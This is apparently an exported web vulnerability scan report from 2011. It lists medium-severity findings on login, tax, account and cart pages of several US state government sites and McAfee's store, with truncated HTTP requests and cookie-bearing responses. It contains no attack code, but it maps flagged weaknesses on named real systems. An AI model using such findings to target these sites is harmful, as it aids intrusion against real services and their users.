| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:26:09 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://apps.tn.gov |
| Path: | /bizreg/bizregprog |
| GET /bizreg/bizregprog?action Host: apps.tn.gov Connection: keep-alive Referer: https://apps.tn.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=58316655 |
| HTTP/1.1 302 Moved Temporarily Date: Sat, 30 Apr 2011 00:58:54 GMT Server: Apache-Coyote/1.1 X-Powered-By: Location: http://apps.tn.gov/bizreg Content-Length: 0 Set-Cookie: JSESSIONID=7C1C1CB77 Set-Cookie: JSESSIONID=5135D2306 Keep-Alive: timeout=30, max=5500 Connection: Keep-Alive Content-Type: text/plain; charset=UTF-8 |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://apps.tn.gov |
| Path: | /bizreg/tax.jsp |
| GET /bizreg/tax.jsp HTTP/1.1 Host: apps.tn.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=AEF014064 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:19:00 GMT Server: Apache-Coyote/1.1 X-Powered-By: Content-Type: text/html;charset=ISO Content-Length: 4949 Set-Cookie: JSESSIONID=458EE0883 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"><!-- #BeginTemplate "/Templates/bizreg.dwt" --><!-- DW6 --> <head> <!-- #BeginEditable "doctitle" --> <title> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://apps.tn.gov |
| Path: | /biztax-app/login.html |
| GET /biztax-app/login.html HTTP/1.1 Host: apps.tn.gov Connection: keep-alive Referer: https://apps.tn.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=58316655 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:03:25 GMT Server: Apache-Coyote/1.1 X-Powered-By: Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 2889 Set-Cookie: JSESSIONID=5917367B2 Keep-Alive: timeout=30, max=5500 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://apps.tn.gov |
| Path: | /paams-app/index.htm |
| GET /paams-app/index.htm HTTP/1.1 Host: apps.tn.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=AEF014064 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:19:00 GMT Server: Apache-Coyote/1.1 X-Powered-By: Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=ISO Content-Language: en Content-Length: 3132 Set-Cookie: JSESSIONID=FFF26F20E Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://apps.tn.gov |
| Path: | /paams-app/recover |
| GET /paams-app/recover Host: apps.tn.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=AEF014064 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:19:00 GMT Server: Apache-Coyote/1.1 X-Powered-By: Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=ISO Content-Language: en Content-Length: 2897 Set-Cookie: JSESSIONID=A7331F2AF Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://apps.tn.gov |
| Path: | /paams-app/recover |
| GET /paams-app/recover Host: apps.tn.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=AEF014064 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:19:01 GMT Server: Apache-Coyote/1.1 X-Powered-By: Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=ISO Content-Language: en Content-Length: 2952 Set-Cookie: JSESSIONID=E8C7670E3 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SAACC.asp |
| GET /PGM/ASP/SAACC.asp HTTP/1.1 Host: assist.dhss.delaware.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: assist-persist=170663852 |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Connection: close Date: Sat, 30 Apr 2011 12:16:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 12945 Content-Type: text/html Expires: Sat, 30 Apr 2011 12:16:42 GMT Set-Cookie: ASPSESSIONIDCCQADQAB Cache-control: no-cache <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML LANG="EN"> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <META HTTP-EQUIV="Pragma" CONTEN ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SACOM.asp |
| GET /PGM/ASP/SACOM.asp HTTP/1.1 Host: assist.dhss.delaware.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: assist-persist=170663852 |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Connection: close Date: Sat, 30 Apr 2011 12:16:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 15110 Content-Type: text/html Expires: Sat, 30 Apr 2011 12:16:42 GMT Set-Cookie: ASPSESSIONIDCCQADQAB Cache-control: no-cache <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML LANG="EN"> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <META HTTP-EQUIV="Pragma" CONTEN ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SC001.asp |
| GET /PGM/ASP/SC001.asp HTTP/1.1 Host: assist.dhss.delaware.gov Connection: keep-alive Referer: http://de.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Date: Sat, 30 Apr 2011 00:36:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 10198 Content-Type: text/html Expires: Sat, 30 Apr 2011 00:36:04 GMT Set-Cookie: ASPSESSIONIDACRDBQAB Cache-control: no-cache <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html LANG="en"> <head> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <meta HTTP-EQUIV="Pragma" CONTE ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SC002.asp |
| GET /PGM/ASP/SC002.asp HTTP/1.1 Host: assist.dhss.delaware.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: assist-persist=170663852 |
| HTTP/1.1 302 Object moved Set-Cookie: assist-persist=170663852 Connection: close Date: Sat, 30 Apr 2011 12:16:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Location: SMPRB.asp Content-Length: 130 Content-Type: text/html Expires: Sat, 30 Apr 2011 12:16:42 GMT Set-Cookie: ASPSESSIONIDCCQADQAB Cache-control: no-cache <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="SMPRB.asp">here</a> |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SC020.asp |
| GET /PGM/ASP/SC020.asp?hdn Host: assist.dhss.delaware.gov Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: assist-persist=170663852 |
| HTTP/1.1 302 Object moved Set-Cookie: assist-persist=170663852 Date: Sat, 30 Apr 2011 01:44:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: SC002.asp?hdn_SessionId Content-Length: 194 Content-Type: text/html Set-Cookie: ASPSESSIONIDACRDBQAB Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="SC002.asp?hdn |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SC020.asp |
| GET /PGM/ASP/SC020.asp HTTP/1.1 Host: assist.dhss.delaware.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: assist-persist=170663852 |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Connection: close Date: Sat, 30 Apr 2011 12:16:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 0 Content-Type: text/html Set-Cookie: ASPSESSIONIDCCQADQAB Cache-control: private |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SC024.asp |
| GET /PGM/ASP/SC024.asp HTTP/1.1 Host: assist.dhss.delaware.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: assist-persist=170663852 |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Connection: close Date: Sat, 30 Apr 2011 12:16:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 10129 Content-Type: text/html Expires: Sat, 30 Apr 2011 12:16:42 GMT Set-Cookie: ASPSESSIONIDCCQADQAB Cache-control: no-cache <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html LANG="en"> <head> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <meta HTTP-EQUIV="Pragma" CONTE ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SC031.asp |
| GET /PGM/ASP/SC031.asp HTTP/1.1 Host: assist.dhss.delaware.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: assist-persist=170663852 |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Connection: close Date: Sat, 30 Apr 2011 12:16:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 16134 Content-Type: text/html Expires: Sat, 30 Apr 2011 12:16:42 GMT Set-Cookie: ASPSESSIONIDCCQADQAB Cache-control: no-cache <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html LANG="en"> <head> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <meta HTTP-EQUIV="Pragma" CONTE ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://dhr.ky.gov |
| Path: | /DHRWeb/RS |
| GET /DHRWeb/RS HTTP/1.1 Host: dhr.ky.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 Document follows Server: IBM HTTP Server/V5R3M0 Connection: close Accept-Ranges: bytes Content-Type: text/html;charset=ISO Content-Length: 10123 Last-Modified: Sat, 30 Apr 2011 12:20:07 GMT Expires: Thu, 01 Dec 1994 16:00:00 GMT Content-Language: en-US Set-Cookie: JSESSIONID=0000nPEe3 Date: Sat, 30 Apr 2011 12:20:08 GMT Server: WebSphere Application Server/7.0 Cache-Control: no-cache="set-cookie, set-cookie2" <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head> <title>DHR.KY.GOV - Home Page</title> <meta ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://dotax.ehawaii.gov |
| Path: | /efile/user |
| POST /efile/user HTTP/1.1 Host: dotax.ehawaii.gov Connection: keep-alive Referer: https://www.ehawaii.gov Cache-Control: max-age=0 Origin: https://www.ehawaii.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=180588659 Content-Length: 78 SESSION_ID=&CURRSTATE=com |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 22:18:43 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Set-Cookie: JSESSIONID=4969BAED7 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 7156 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://egov.dnrec |
| Path: | /egovpublic/dnrec/disp |
| GET /egovpublic/dnrec/disp HTTP/1.1 Host: egov.dnrec.delaware.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 500 Internal Server Error Date: Sat, 30 Apr 2011 12:20:03 GMT Server: Apache/2.2.0 (Fedora) Surrogate-Control: no-store $WSEP: Set-Cookie: JSESSIONID=0000i5hwq Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Content-Length: 12 Connection: close Content-Type: text/html;charset=ISO Content-Language: en-US Error 500: |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://fin.oaks.ohio.gov |
| Path: | /psp/FNPRD/ |
| GET /psp/FNPRD/ HTTP/1.1 Host: fin.oaks.ohio.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Set-Cookie: fin.oaks.ohio.gov Date: Sat, 30 Apr 2011 12:20:09 GMT Content-Length: 12902 Content-Type: text/html; CHARSET=utf-8 Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: FNPRD-PORTAL-PSJSESSIONID Cache-Control: no-store RespondingWithSignonPage: true Connection: close <!--* ************************* * Confidentiality Information: * * This module is the confidential and proprietary information of * PeopleSoft, Inc.; ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://fortress.wa.gov |
| Path: | /dol/dolprod/dsdoffices/ |
| GET /dol/dolprod/dsdoffices/ HTTP/1.1 Host: fortress.wa.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK connection: close content-type: text/html; charset=utf-8 date: Sat, 30 Apr 2011 12:20:40 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: Microsoft-IIS/6.0 x-old-content-length: 26606 cache-control: private x-powered-by: ASP.NET x-aspnet-version: 2.0.50727 Set-Cookie: AMWEBJCT!%2Fdol%2Fdolprod Set-Cookie: PD_STATEFUL_101c5ca4-0734 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://georgiawildlife |
| Path: | /service/login1.asp |
| GET /service/login1.asp HTTP/1.1 Host: georgiawildlife.dnr.state Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASPSESSIONIDCCRQTQAT |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:20:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 28917 Content-Type: text/html Set-Cookie: ASPSESSIONIDCCCBDBRT Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="Head1" runat="serve ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://hcm.oaks.ohio.gov |
| Path: | /psp/HCPRD/ |
| GET /psp/HCPRD/ HTTP/1.1 Host: hcm.oaks.ohio.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Set-Cookie: hcm.oaks.ohio.gov Date: Sat, 30 Apr 2011 12:20:31 GMT Content-Length: 14341 Content-Type: text/html; CHARSET=utf-8 Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: HCPRD-PORTAL-PSJSESSIONID Cache-Control: no-store RespondingWithSignonPage: true Connection: close <!--* ************************* * Confidentiality Information: * * This module is the confidential and proprietary information of * PeopleSoft, Inc.; ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://home.mcafee.com |
| Path: | /ScriptResource.axd |
| GET /ScriptResource.axd HTTP/1.1 Host: home.mcafee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_ev8=%5B%5B%27mcafee%27 |
| HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: session%5Fdata= Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:44 GMT; path=/; HttpOnly Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:44 GMT; path=/; HttpOnly Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: SessionInfo=AffiliateId=0 X-Powered-By: ASP.NET MS: SJV1 X-UA-Compatible: IE=8 Date: Fri, 29 Apr 2011 21:18:44 GMT Connection: close Content-Length: 9425 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmldom" xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://home.mcafee.com |
| Path: | /Secure/Protected/Login |
| GET /Secure/Protected/Login Host: home.mcafee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_ev8=%5B%5B%27mcafee%27 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: session%5Fdata= Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:21 GMT; path=/; HttpOnly Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: lUsrCtxSession= Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly Set-Cookie: HPrst=gu=65a488fe-5ba0 Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly Set-Cookie: HRntm=aff=0-0&cur=56 Set-Cookie: IscartemptySiteidAffid=no X-Powered-By: ASP.NET MS: SJV1 X-UA-Compatible: IE=8 Date: Fri, 29 Apr 2011 21:18:21 GMT Content-Length: 52910 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmldom" xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://home.mcafee.com |
| Path: | /WebResource.axd |
| GET /WebResource.axd HTTP/1.1 Host: home.mcafee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_ev8=%5B%5B%27mcafee%27 |
| HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: session%5Fdata= Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:40 GMT; path=/; HttpOnly Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:40 GMT; path=/; HttpOnly Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: SessionInfo=AffiliateId=0 X-Powered-By: ASP.NET MS: SJV8 X-UA-Compatible: IE=8 Date: Fri, 29 Apr 2011 21:18:40 GMT Connection: close Content-Length: 9425 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmldom" xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://home.mcafee.com |
| Path: | /WebServices/Account |
| GET /WebServices/Account Host: home.mcafee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_ev8=%5B%5B%27mcafee%27 |
| HTTP/1.1 200 OK Cache-Control: public Content-Type: application/x-javascript; charset=utf-8 Expires: Wed, 21 Apr 2010 22:42:19 GMT Last-Modified: Thu, 21 Apr 2011 22:42:19 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: session%5Fdata= Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:45 GMT; path=/; HttpOnly Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:45 GMT; path=/; HttpOnly Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: lUsrCtxSession= Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:45 GMT; path=/; HttpOnly Set-Cookie: HPrst=gu=65a488fe-5ba0 Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly Set-Cookie: HRntm=aff=0-0&cur=56&cid Set-Cookie: IscartemptySiteidAffid=no X-Powered-By: ASP.NET MS: SJV4 X-UA-Compatible: IE=8 Date: Fri, 29 Apr 2011 21:18:44 GMT Content-Length: 4551 Connection: close Type.registerNamespace( McAfee.WebServices McAfee.WebServices this._timeout = 0; this._userContext = null; thi ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://home.mcafee.com |
| Path: | /secure/cart |
| GET /secure/cart HTTP/1.1 Host: home.mcafee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_ev8=%5B%5B%27mcafee%27 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: session%5Fdata= Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:29 GMT; path=/; HttpOnly Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: lBounceURL=http://home Set-Cookie: lUsrCtxSession= Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly Set-Cookie: HPrst=gu=65a488fe-5ba0 Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly Set-Cookie: HRntm=aff=0-0&cur=56&cid Set-Cookie: IscartemptySiteidAffid=no X-Powered-By: ASP.NET MS: SJV8 X-UA-Compatible: IE=8 Date: Fri, 29 Apr 2011 21:18:29 GMT Content-Length: 37490 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmldom" xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://home.mcafee.com |
| Path: | /secure/cart/ |
| GET /secure/cart/ HTTP/1.1 Host: home.mcafee.com Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SessionInfo=AffiliateId=0 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: session%5Fdata= Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 20:58:11 GMT; path=/; HttpOnly Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: SessionInfo=AffiliateId=0 Set-Cookie: lBounceURL=http://home Set-Cookie: lUsrCtxSession= Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly Set-Cookie: HPrst=gu=65a488fe-5ba0 Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly Set-Cookie: HRntm=aff=0-0&cur=56&cid Set-Cookie: IscartemptySiteidAffid=no X-Powered-By: ASP.NET MS: SJV7 X-UA-Compatible: IE=8 Date: Fri, 29 Apr 2011 20:58:10 GMT Content-Length: 36966 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmldom" xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://home.mcafee.com |
| Path: | /secure/purchase/ |
